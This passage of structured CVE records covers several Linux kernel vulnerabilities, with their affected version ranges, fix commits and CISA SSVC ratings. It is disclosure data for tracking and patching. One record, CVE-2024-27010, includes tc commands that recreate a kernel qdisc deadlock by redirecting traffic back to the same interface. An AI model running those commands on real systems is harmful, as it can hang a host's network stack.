"url": "https://git.kernel.org/stable/c/71dd428615375e36523f4d4f7685ddd54113646d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/28c8d274848feba552e95c5c2a7e3cfe8f15c534"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b502d4a08875ea2b4ea5d5b28dc7c991c8b90cfb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f58679996a831754a356974376f248aa0af2eb8e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/23e4099bdc3c8381992f9eb975c79196d6755210"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42229",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:28.221263Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:32.961Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"crypto/aead.c",
"crypto/cipher.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "89b9b6fa4463daf820e6a5ef65c3b0c2db239513",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b716e9c3603ee95ed45e938fe47227d22cf3ec35",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9db8c299a521813630fcb4154298cb60c37f3133",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "71dd428615375e36523f4d4f7685ddd54113646d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "28c8d274848feba552e95c5c2a7e3cfe8f15c534",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b502d4a08875ea2b4ea5d5b28dc7c991c8b90cfb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f58679996a831754a356974376f248aa0af2eb8e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "23e4099bdc3c8381992f9eb975c79196d6755210",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"crypto/aead.c",
"crypto/cipher.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.323",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.285",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.323",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.285",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: aead,cipher - zeroize key buffer after use\n\nI.G 9.7.B for FIPS 140-3 specifies that variables temporarily holding\ncryptographic information should be zeroized once they are no longer\nneeded. Accomplish this by using kfree_sensitive for buffers that\npreviously held the private key."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:36.883Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/89b9b6fa4463daf820e6a5ef65c3b0c2db239513"
},
{
"url": "https://git.kernel.org/stable/c/b716e9c3603ee95ed45e938fe47227d22cf3ec35"
},
{
"url": "https://git.kernel.org/stable/c/9db8c299a521813630fcb4154298cb60c37f3133"
},
{
"url": "https://git.kernel.org/stable/c/71dd428615375e36523f4d4f7685ddd54113646d"
},
{
"url": "https://git.kernel.org/stable/c/28c8d274848feba552e95c5c2a7e3cfe8f15c534"
},
{
"url": "https://git.kernel.org/stable/c/b502d4a08875ea2b4ea5d5b28dc7c991c8b90cfb"
},
{
"url": "https://git.kernel.org/stable/c/f58679996a831754a356974376f248aa0af2eb8e"
},
{
"url": "https://git.kernel.org/stable/c/23e4099bdc3c8381992f9eb975c79196d6755210"
}
],
"title": "crypto: aead,cipher - zeroize key buffer after use",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42229",
"datePublished": "2024-07-30T07:47:09.817Z",
"dateReserved": "2024-07-30T07:40:12.250Z",
"dateUpdated": "2025-05-04T09:24:36.883Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-39489 (GCVE-0-2024-39489)
Vulnerability from cvelistv5
Published
2024-07-10 07:14
Modified
2025-05-04 09:16
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: fix memleak in seg6_hmac_init_algo
seg6_hmac_init_algo returns without cleaning up the previous allocations
if one fails, so it's going to leak all that memory and the crypto tfms.
Update seg6_hmac_exit to only free the memory when allocated, so we can
reuse the code directly.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bf355b8d2c30a289232042cacc1cfaea4923936c Version: bf355b8d2c30a289232042cacc1cfaea4923936c Version: bf355b8d2c30a289232042cacc1cfaea4923936c Version: bf355b8d2c30a289232042cacc1cfaea4923936c Version: bf355b8d2c30a289232042cacc1cfaea4923936c Version: bf355b8d2c30a289232042cacc1cfaea4923936c Version: bf355b8d2c30a289232042cacc1cfaea4923936c Version: bf355b8d2c30a289232042cacc1cfaea4923936c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-39489",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-10T15:29:00.880316Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-10T15:29:14.835Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:26:15.940Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afd5730969aec960a2fee4e5ee839a6014643976"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a3fcf53725b70010d1cf869a2ba549fed6b8fb3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/daf341e0a2318b813427d5a78788c86f4a7f02be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61d31ac85b4572d11f8071855c0ccb4f32d76c0c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/599a5654215092ac22bfc453f4fd3959c55ea821"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0e44d6cbe8de983470c3d2f978649783384fdcb6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6a99ef4e056c20a138a95cc51332b2b96c8f383"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/efb9f4f19f8e37fde43dfecebc80292d179f56c6"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6_hmac.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "afd5730969aec960a2fee4e5ee839a6014643976",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
},
{
"lessThan": "4a3fcf53725b70010d1cf869a2ba549fed6b8fb3",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
},
{
"lessThan": "daf341e0a2318b813427d5a78788c86f4a7f02be",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
},
{
"lessThan": "61d31ac85b4572d11f8071855c0ccb4f32d76c0c",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
},
{
"lessThan": "599a5654215092ac22bfc453f4fd3959c55ea821",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
},
{
"lessThan": "0e44d6cbe8de983470c3d2f978649783384fdcb6",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
},
{
"lessThan": "f6a99ef4e056c20a138a95cc51332b2b96c8f383",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
},
{
"lessThan": "efb9f4f19f8e37fde43dfecebc80292d179f56c6",
"status": "affected",
"version": "bf355b8d2c30a289232042cacc1cfaea4923936c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6_hmac.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: sr: fix memleak in seg6_hmac_init_algo\n\nseg6_hmac_init_algo returns without cleaning up the previous allocations\nif one fails, so it\u0027s going to leak all that memory and the crypto tfms.\n\nUpdate seg6_hmac_exit to only free the memory when allocated, so we can\nreuse the code directly."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:16:53.038Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/afd5730969aec960a2fee4e5ee839a6014643976"
},
{
"url": "https://git.kernel.org/stable/c/4a3fcf53725b70010d1cf869a2ba549fed6b8fb3"
},
{
"url": "https://git.kernel.org/stable/c/daf341e0a2318b813427d5a78788c86f4a7f02be"
},
{
"url": "https://git.kernel.org/stable/c/61d31ac85b4572d11f8071855c0ccb4f32d76c0c"
},
{
"url": "https://git.kernel.org/stable/c/599a5654215092ac22bfc453f4fd3959c55ea821"
},
{
"url": "https://git.kernel.org/stable/c/0e44d6cbe8de983470c3d2f978649783384fdcb6"
},
{
"url": "https://git.kernel.org/stable/c/f6a99ef4e056c20a138a95cc51332b2b96c8f383"
},
{
"url": "https://git.kernel.org/stable/c/efb9f4f19f8e37fde43dfecebc80292d179f56c6"
}
],
"title": "ipv6: sr: fix memleak in seg6_hmac_init_algo",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-39489",
"datePublished": "2024-07-10T07:14:08.988Z",
"dateReserved": "2024-06-25T14:23:23.747Z",
"dateUpdated": "2025-05-04T09:16:53.038Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42320 (GCVE-0-2024-42320)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 12:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/dasd: fix error checks in dasd_copy_pair_store()
dasd_add_busid() can return an error via ERR_PTR() if an allocation
fails. However, two callsites in dasd_copy_pair_store() do not check
the result, potentially resulting in a NULL pointer dereference. Fix
this by checking the result with IS_ERR() and returning the error up
the stack.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42320",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:28.985238Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:25.946Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/s390/block/dasd_devmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cc8b7284d5076722e0b8062373b68d8e47c3bace",
"status": "affected",
"version": "a91ff09d39f9b6545254839ac91f1ff7bd21d39e",
"versionType": "git"
},
{
"lessThan": "e511167e65d332d07b3c7a3d5a741ee9c19a8c27",
"status": "affected",
"version": "a91ff09d39f9b6545254839ac91f1ff7bd21d39e",
"versionType": "git"
},
{
"lessThan": "68d4c3722290ad300c295fb3435e835d200d5cb2",
"status": "affected",
"version": "a91ff09d39f9b6545254839ac91f1ff7bd21d39e",
"versionType": "git"
},
{
"lessThan": "8e64d2356cbc800b4cd0e3e614797f76bcf0cdb8",
"status": "affected",
"version": "a91ff09d39f9b6545254839ac91f1ff7bd21d39e",
"versionType": "git"
},
{
"status": "affected",
"version": "932600a295cc299d470ca7f5d6491bd0dfc99ea7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/s390/block/dasd_devmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.153",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/dasd: fix error checks in dasd_copy_pair_store()\n\ndasd_add_busid() can return an error via ERR_PTR() if an allocation\nfails. However, two callsites in dasd_copy_pair_store() do not check\nthe result, potentially resulting in a NULL pointer dereference. Fix\nthis by checking the result with IS_ERR() and returning the error up\nthe stack."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:58:06.182Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cc8b7284d5076722e0b8062373b68d8e47c3bace"
},
{
"url": "https://git.kernel.org/stable/c/e511167e65d332d07b3c7a3d5a741ee9c19a8c27"
},
{
"url": "https://git.kernel.org/stable/c/68d4c3722290ad300c295fb3435e835d200d5cb2"
},
{
"url": "https://git.kernel.org/stable/c/8e64d2356cbc800b4cd0e3e614797f76bcf0cdb8"
}
],
"title": "s390/dasd: fix error checks in dasd_copy_pair_store()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42320",
"datePublished": "2024-08-17T09:09:32.695Z",
"dateReserved": "2024-07-30T07:40:12.279Z",
"dateUpdated": "2025-05-04T12:58:06.182Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27010 (GCVE-0-2024-27010)
Vulnerability from cvelistv5
Published
2024-05-01 05:29
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: Fix mirred deadlock on device recursion
When the mirred action is used on a classful egress qdisc and a packet is
mirrored or redirected to self we hit a qdisc lock deadlock.
See trace below.
[..... other info removed for brevity....]
[ 82.890906]
[ 82.890906] ============================================
[ 82.890906] WARNING: possible recursive locking detected
[ 82.890906] 6.8.0-05205-g77fadd89fe2d-dirty #213 Tainted: G W
[ 82.890906] --------------------------------------------
[ 82.890906] ping/418 is trying to acquire lock:
[ 82.890906] ffff888006994110 (&sch->q.lock){+.-.}-{3:3}, at:
__dev_queue_xmit+0x1778/0x3550
[ 82.890906]
[ 82.890906] but task is already holding lock:
[ 82.890906] ffff888006994110 (&sch->q.lock){+.-.}-{3:3}, at:
__dev_queue_xmit+0x1778/0x3550
[ 82.890906]
[ 82.890906] other info that might help us debug this:
[ 82.890906] Possible unsafe locking scenario:
[ 82.890906]
[ 82.890906] CPU0
[ 82.890906] ----
[ 82.890906] lock(&sch->q.lock);
[ 82.890906] lock(&sch->q.lock);
[ 82.890906]
[ 82.890906] *** DEADLOCK ***
[ 82.890906]
[..... other info removed for brevity....]
Example setup (eth0->eth0) to recreate
tc qdisc add dev eth0 root handle 1: htb default 30
tc filter add dev eth0 handle 1: protocol ip prio 2 matchall \
action mirred egress redirect dev eth0
Another example(eth0->eth1->eth0) to recreate
tc qdisc add dev eth0 root handle 1: htb default 30
tc filter add dev eth0 handle 1: protocol ip prio 2 matchall \
action mirred egress redirect dev eth1
tc qdisc add dev eth1 root handle 1: htb default 30
tc filter add dev eth1 handle 1: protocol ip prio 2 matchall \
action mirred egress redirect dev eth0
We fix this by adding an owner field (CPU id) to struct Qdisc set after
root qdisc is entered. When the softirq enters it a second time, if the
qdisc owner is the same CPU, the packet is dropped to break the loop.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27010",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-17T15:03:35.408191Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T15:03:46.655Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.885Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e6b90468da4dae2281a6e381107f411efb48b0ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0f022d32c3eca477fbf79a205243a6123ed0fe11"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/sch_generic.h",
"net/core/dev.c",
"net/sched/sch_generic.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e6b90468da4dae2281a6e381107f411efb48b0ef",
"status": "affected",
"version": "e578d9c02587d57bfa7b560767c698a668a468c6",
"versionType": "git"
},
{
"lessThan": "0f022d32c3eca477fbf79a205243a6123ed0fe11",
"status": "affected",
"version": "e578d9c02587d57bfa7b560767c698a668a468c6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/sch_generic.h",
"net/core/dev.c",
"net/sched/sch_generic.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: Fix mirred deadlock on device recursion\n\nWhen the mirred action is used on a classful egress qdisc and a packet is\nmirrored or redirected to self we hit a qdisc lock deadlock.\nSee trace below.\n\n[..... other info removed for brevity....]\n[ 82.890906]\n[ 82.890906] ============================================\n[ 82.890906] WARNING: possible recursive locking detected\n[ 82.890906] 6.8.0-05205-g77fadd89fe2d-dirty #213 Tainted: G W\n[ 82.890906] --------------------------------------------\n[ 82.890906] ping/418 is trying to acquire lock:\n[ 82.890906] ffff888006994110 (\u0026sch-\u003eq.lock){+.-.}-{3:3}, at:\n__dev_queue_xmit+0x1778/0x3550\n[ 82.890906]\n[ 82.890906] but task is already holding lock:\n[ 82.890906] ffff888006994110 (\u0026sch-\u003eq.lock){+.-.}-{3:3}, at:\n__dev_queue_xmit+0x1778/0x3550\n[ 82.890906]\n[ 82.890906] other info that might help us debug this:\n[ 82.890906] Possible unsafe locking scenario:\n[ 82.890906]\n[ 82.890906] CPU0\n[ 82.890906] ----\n[ 82.890906] lock(\u0026sch-\u003eq.lock);\n[ 82.890906] lock(\u0026sch-\u003eq.lock);\n[ 82.890906]\n[ 82.890906] *** DEADLOCK ***\n[ 82.890906]\n[..... other info removed for brevity....]\n\nExample setup (eth0-\u003eeth0) to recreate\ntc qdisc add dev eth0 root handle 1: htb default 30\ntc filter add dev eth0 handle 1: protocol ip prio 2 matchall \\\n action mirred egress redirect dev eth0\n\nAnother example(eth0-\u003eeth1-\u003eeth0) to recreate\ntc qdisc add dev eth0 root handle 1: htb default 30\ntc filter add dev eth0 handle 1: protocol ip prio 2 matchall \\\n action mirred egress redirect dev eth1\n\ntc qdisc add dev eth1 root handle 1: htb default 30\ntc filter add dev eth1 handle 1: protocol ip prio 2 matchall \\\n action mirred egress redirect dev eth0\n\nWe fix this by adding an owner field (CPU id) to struct Qdisc set after\nroot qdisc is entered. When the softirq enters it a second time, if the\nqdisc owner is the same CPU, the packet is dropped to break the loop."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:06.280Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e6b90468da4dae2281a6e381107f411efb48b0ef"
},
{
"url": "https://git.kernel.org/stable/c/0f022d32c3eca477fbf79a205243a6123ed0fe11"
}
],
"title": "net/sched: Fix mirred deadlock on device recursion",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27010",
"datePublished": "2024-05-01T05:29:23.494Z",
"dateReserved": "2024-02-19T14:20:24.208Z",
"dateUpdated": "2025-05-04T09:02:06.280Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48802 (GCVE-0-2022-48802)
Vulnerability from cvelistv5
Published
2024-07-16 11:43
Modified
2025-05-04 08:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
